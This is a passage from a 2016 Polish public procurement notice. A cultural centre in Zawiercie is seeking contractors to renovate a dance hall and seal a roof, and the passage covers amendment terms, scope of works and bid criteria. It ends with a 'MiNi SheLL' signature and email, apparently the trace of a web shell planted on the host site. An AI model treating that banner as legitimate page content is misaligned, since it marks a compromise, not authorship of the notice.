4)	zmiana lub wprowadzenie podwykonawcy dot. zakresu robót przeznaczonych do wykonania przez podwykonawcę, pomimo, że w ofercie opracowanej na potrzeby postępowania, w wyniku którego doszło do zawarcia umowy, Wykonawca nie przedstawił zakresu robót, który powierzy podwykonawcom, w przypadku wystąpienia zmian w tym zakresie - na wniosek Zamawiającego lub Wykonawcy,
5)	zmiana technologii wykonania robót, lub zmiana materiałów, jeżeli nowe rozwiązania będą korzystne dla Zamawiającego, przy zachowaniu niepogorszonych standardów jakościowych,
6)	Zmiana wynagrodzenia Wykonawcy może nastąpić w przypadku:
a) ograniczenia zakresu robót przez Zamawiającego.
3.	Wniosek o ewentualne zmiany postanowień zawartej umowy Wykonawca winien dostarczyć do Zamawiającego w terminie nie później niż 7 dni przed upływem terminu umownego. W przeciwnym wypadku Zamawiający może pozostawić wniosek bez biegu.
4.	Wykonawcy nie przysługuje roszczenie o wprowadzenie zmian.
5.	Zmiany niniejszej umowy wymagają formy pisemnej pod rygorem nieważności.
Zadanie nr 2:
Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
1) Zmiana wynagrodzenia Wykonawcy może nastąpić w przypadku:
a) ograniczenia zakresu robót przez Zamawiającego.
2) Zmiana terminu zakończenia realizacji przedmiotu zamówienia może nastąpić w przypadku:
a) udzielenia dotychczasowemu Wykonawcy zamówień dodatkowych, o których mowa w art. 67  ust. 1 pkt 5 ustawy Prawo zamówień publicznych,
b) wystąpienia wad lub braków w dokumentacji stanowiącej opis przedmiotu zamówienia,
c) zawieszenia przez Zamawiającego wykonania robót,
d) działania siły wyższej - rozumianej jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności, a które uniemożliwia Wykonawcy wykonanie jego zobowiązania w całości lub części. W razie wystąpienia siły wyższej strony umowy zobowiązane są do dołożenia wszelkich starań w celu ograniczenia do minimum opóźnienia w wykonywaniu swoich zobowiązań umownych  powstałych na skutek działania siły wyższej,
e) braku możliwości prowadzenia prac budowlanych spowodowanych niesprzyjającymi warunkami atmosferycznymi, uniemożliwiającymi ich wykonanie zgodnie z wymaganiami technologicznymi, jeżeli rzeczywiście nie prowadzono w tym okresie prac, robót budowlanych oraz innych usług wchodzących w zakres przedmiotu umowy. W takim wypadku termin zakończenia robót może zostać przesunięty o czas przerwy w robotach udokumentowany przez inspektora nadzoru inwestorskiego,
3) Zmiany osobowe - mogą nastąpić poprzez pisemne zgłoszenie tego faktu drugiej stronie i nie wymaga zawarcia aneksu do umowy.
4) Zmiany lub rezygnacji z podwykonawcy robót lub wprowadzenie nowego podwykonawcy w zakresie nieprzewidzianym w formularzu oferty. W przypadku gdy dotychczasowy podwykonawca swoimi zasobami potwierdzał spełnienie przez Wykonawcę warunków udziału w postępowaniu nowy podwykonawca lub Wykonawca samodzielnie musi spełniać warunki udziału w postępowaniu w takim samym zakresie jak dotychczasowy podwykonawca tj. pozwalający spełnić warunki podane w SIWZ.
5) Zmiany danych związanych z obsługą administracyjno-organizacyjną umowy, (np. danych teleadresowych Wykonawcy, Zamawiającego itp.)- zmiana może nastąpić poprzez pisemne zgłoszenie tego faktu drugiej stronie i nie wymaga zawarcia aneksu do umowy.
2. Zmiana postanowień umowy z naruszeniem ust. 1 jest nieważna.
3. Zmiana postanowień umowy może nastąpić jedynie wtedy, gdy nie jest ona sprzeczna z ustawą Prawo zamówień publicznych i wymaga zachowania formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.mok.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Kultury Centrum im. Adama Mickiewicza 
ul. Piastowska 1, 42-400 Zawiercie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.07.2016 godzina 09:00, miejsce: Miejski Ośrodek Kultury Centrum im. Adama Mickiewicza ul. Piastowska 1, 42-400 Zawiercie  (Sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Ogłoszenie o zamówieniu zostało zamieszczone w Biuletynie Zamówień Publicznych w dniu 08.07.2016r.
Termin realizacji zamówienia:
Zadanie nr 1: maksymalnie 45 dni od dnia podpisania umowy; minimalny termin realizacji zamówienia: 15 dni od dnia podpisania umowy.
Zadanie nr 2: do 14 dni od dnia zawarcia umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont i wyposażenie Sali tanecznej nr 320 wraz z przyległą szatnią w budynku Miejskiego Ośrodka Kultury Centrum im. Adama Mickiewicza w Zawierciu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia obejmuje remont pomieszczenia Sali tanecznej nr 320 oraz pomieszczenia szatni, aranżację meblową wnętrz wraz z dostosowaniem instalacji elektrycznej oświetleniowej oraz lokalizacji gniazd elektrycznych dla potrzeb osób odbywających w niej próby oraz ćwiczenia taneczne.

1.	Zakres prac obejmuje:

Roboty demontażowe:
-	demontaż trzech sztuk drzwi,
-	demontaż przewodu wentylacyjnego o długości 8m, wykonanego z blachy stalowej,
-	demontaż osłony przewodu wentylacyjnego,
-	demontaż karniszy oraz żaluzji okiennych,
-	rozebranie boazerii ściennej,
-	demontaż lamp oświetleniowych;
-	demontaż istniejącej posadzki w szatni (płytki PCV),
-	skucie posadzki cementowej w szatni,
-	demontaż istniejących włączników i gniazd elektrycznych,
-	częściowe wyburzenie ścian.
-	
Roboty remontowo-montażowe:
-	wykonanie przesklepienia otworów drzwiowych,
-	uzupełnienie ścianek działowych,
-	uzupełnienie tynków,
-	obsadzenie kratek wentylacyjnych, ściennych oraz sufitowych,
-	obsadzenie ościeżnic wraz z montażem drzwi aluminiowych,
-	montaż ościeżnicy wraz ze skrzydłem drzwiowym drewnianym,
-	montaż trzech sztuk progów z drewna liściastego,
-	wyrównanie podłoża pod posadzkę w szatni,
-	montaż płytek podłogowych w szatni wraz z cokołami,
-	wykonanie sufitu podwieszonego gipsowo-kartonowego na powierzchni 32,10m2,
-	zmycie i zeskrobanie starej farby na ścianach oraz sufitach,
-	przygotowanie podłoża pod malowanie farbami akrylowymi,
-	dwukrotne malowanie ścian i sufitów farbami akrylowymi.

	Roboty elektryczne:
-	montaż przewodów elektrycznych,
-	montaż lamp (plafonów) oświetleniowych - 17 szt.,
-	montaż opraw halogenowych - 16 szt.,
-	montaż włączników świetlnych oraz gniazdek.
	Roboty związane z konserwacją podłogi na sali tanecznej:
-	mechaniczne szlifowanie parkietu,
-	wymiana listew przyściennych,
-	jednokrotne malowanie parkietu-półmat.
-	
Wykończenie i wyposażenie wnętrza:
-	dostarczenie i montaż zabudowy garderoby oraz pozostałych elementów,
-	wyposażenie wnętrza sali tanecznej oraz szatni,
-	montaż drzwi podwieszonych przesuwnych do wydzielonej garderoby,
-	dostarczenie i montaż rolet okiennych podgumowanych, kolor antracyt.

2.	Stan istniejący:
Sala taneczna nr 320 zlokalizowana na II piętrze Miejskiego Ośrodka Kultury Centrum w Zawierciu. Dojście do sali prowadzi z klatki schodowej przez korytarz, gdzie zlokalizowane jest bezpośrednie wejście do sali oraz szatni. Pomieszczenia szatni oraz sala są przyległe, komunikacja między nimi jest zapewniona poprze przejście z sali tanecznej. Przedmiotowe pomieszczenia są doświetlone światłem naturalnym oraz sztucznym.

Poniżej przedstawiono charakterystyczne parametry sali tanecznej:
	Szerokość: 894 cm
	Długość: 1743 cm
	Wysokość: 298 cm (sufit częściowo podwieszany do wysokości 266cm).

Do sali tanecznej bezpośrednio przylega taras, do którego dojście jest zapewnione poprzez
drzwi balkonowe znajdujące się w sali.

Poniżej przedstawiono charakterystyczne parametry pomieszczenia szatni:
	Szerokość: 270 cm
	Długość: 280 cm
	Wysokość: 298 cm.

3. Każdy z wykonawców uprawniony jest do dokonania oględzin terenu prowadzenia prac na etapie sporządzania ofert celem sprawdzenia warunków panujących na obiekcie. Z uwagi na ryczałtowy charakter zamówienia w ofercie należy uwzględnić wszystkie dodatkowe opłaty związane z wykonywanymi robotami, a wynikającymi z zakresu robót.

4. Sporządzona oferta musi być zgodna z przedmiotem zamówienia, projektem budowlanym, specyfikacją techniczną wykonania i odbioru robót oraz z przedmiarem robót. 

5. Wykonawca jest zobowiązany udzielić gwarancji na przedmiot zamówienia min. 36 miesięcy od daty odbioru końcowego.

6. Jeżeli dokumentacja projektowa w tym przedmiar robót lub specyfikacja techniczna wykonania i odbioru robót budowlanych wskazywałyby w odniesieniu do niektórych materiałów lub urządzeń znaki towarowe, patenty lub pochodzenie - zamawiający, zgodnie z art. 29 ust. 3 ustawy Pzp, dopuszcza oferowanie materiałów lub urządzeń równoważnych pod warunkiem, że posiadają parametry techniczne nie gorsze od wskazanych. Podane w opisie przedmiotu zamówienia nazwy własne nie mają na celu naruszenia art. 29 ustawy Pzp, a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych i technologicznych stawianych przez Zamawiającego. Zamawiający dopuszcza rozwiązana równoważne pod warunkiem spełnienia tego samego poziomu technologicznego i wydajnościowego.

7. Tam, gdzie w dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót lub przedmiarach, przedmiot zamówienia został opisany z pomocą norm aprobat, specyfikacji technicznych i systemów odniesienia, o których mowa w art. 30 ust. 1-3 Zamawiający dopuszcza rozwiązania równoważne opisywanym.

8. Ilekroć w specyfikacji technicznej wykonania i odbioru robót, dokumentacji technicznej mowa jest o polskich normach, należy przez to rozumieć polskie normy przenoszące normy europejskie lub normy innych państw członkowskich Europejskiego Obszaru Gospodarczego, a w ich braku inne stosowane normy w kolejności zgodnej z art. 30 ust. 2 i 3 ustawy PZP.

9. Wykonanie robót budowlanych będących przedmiotem zamówienia nie jest uzależnione od uzyskania pozwolenia na budowę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.43.21.14-6, 45.42.11.31-1, 45.41.00.00-4, 45.44.21.00-8, 45.31.12.00-2, 45.21.23.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 45.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin wykonania przedmiotu zamówienia - 10</li>
<li>3. Okres gwarancji na przedmiot zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Uszczelnienie pokrycia dachowego nad MOK i USC w Zawierciu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia obejmuje częściowe pokrycie starych dachów papą termozgrzewalną wraz z obróbką blacharską oraz wymianę rury odpływowej.

1.	Zakres prac obejmuje:
-	rozbiórkę czapek kominowych,
-	wykonanie nowych czapek kominowych,
-	odbicie odpadających tynków,
-	wykonanie nowych tynków kominów,
-	umocowanie obróbek blacharskich,
-	wymianę sztucera rury odpływowej,
-	obróbki kominów papą termozgrzewalną,
-	jednowarstwowe krycie papą termozgrzewalną,
-	posmarowanie nawierzchni roztworem asfaltowym,
-	wywóz i utylizację gruzu.


2.	Stan istniejący:
Przedmiotowy dach ma powierzchnię ponad 2.000 m2. W kilku miejscach stwierdzono nieszczelności pokrycia dachowego uwidaczniające się na sufitach i na ścianach pomieszczeń ostatniej kondygnacji. Przyczyną zaistniałych zacieków jest obluzowanie się obróbek blacharskich murów ogniowych, odpadający tynk przy kominach i częściowe wykruszenie się batonu na czapkach kominowych oraz odklejenie się obróbek kominów z papy termozgrzewalnej.

3. Każdy z wykonawców uprawniony jest do dokonania oględzin terenu prowadzenia prac na etapie sporządzania ofert celem sprawdzenia warunków panujących na obiekcie. Z uwagi na ryczałtowy charakter zamówienia w ofercie należy uwzględnić wszystkie dodatkowe opłaty związane z wykonywanymi robotami, a wynikającymi z zakresu robót.

4. Sporządzona oferta musi być zgodna z przedmiotem zamówienia, specyfikacją techniczną wykonania i odbioru robót, rzutem dachu oraz z przedmiarem robót. 

5. Wykonawca jest zobowiązany udzielić gwarancji na przedmiot zamówienia min. 36 miesięcy od daty odbioru końcowego.

6. Jeżeli dokumentacja projektowa w tym przedmiar robót lub specyfikacja techniczna wykonania i odbioru robót budowlanych wskazywałyby w odniesieniu do niektórych materiałów lub urządzeń znaki towarowe, patenty lub pochodzenie - zamawiający, zgodnie z art. 29 ust. 3 ustawy Pzp, dopuszcza oferowanie materiałów lub urządzeń równoważnych pod warunkiem, że posiadają parametry techniczne nie gorsze od wskazanych. Podane w opisie przedmiotu zamówienia nazwy własne nie mają na celu naruszenia art. 29 ustawy Pzp, a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych i technologicznych stawianych przez Zamawiającego. Zamawiający dopuszcza rozwiązana równoważne pod warunkiem spełnienia tego samego poziomu technologicznego i wydajnościowego.

7. Tam, gdzie w dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót lub przedmiarach, przedmiot zamówienia został opisany z pomocą norm aprobat, specyfikacji technicznych i systemów odniesienia, o których mowa w art. 30 ust. 1-3 Zamawiający dopuszcza rozwiązania równoważne opisywanym.

8. Ilekroć w specyfikacji technicznej wykonania i odbioru robót, dokumentacji technicznej mowa jest o polskich normach, należy przez to rozumieć polskie normy przenoszące normy europejskie lub normy innych państw członkowskich Europejskiego Obszaru Gospodarczego, a w ich braku inne stosowane normy w kolejności zgodnej z art. 30 ust. 2 i 3 ustawy PZP.

9. Wykonanie robót budowlanych będących przedmiotem zamówienia nie jest uzależnione od uzyskania pozwolenia na budowę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.41.00.00-4, 45.26.12.10-9, 45.26.14.20-4, 45.23.24.52-5, 45.11.12.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com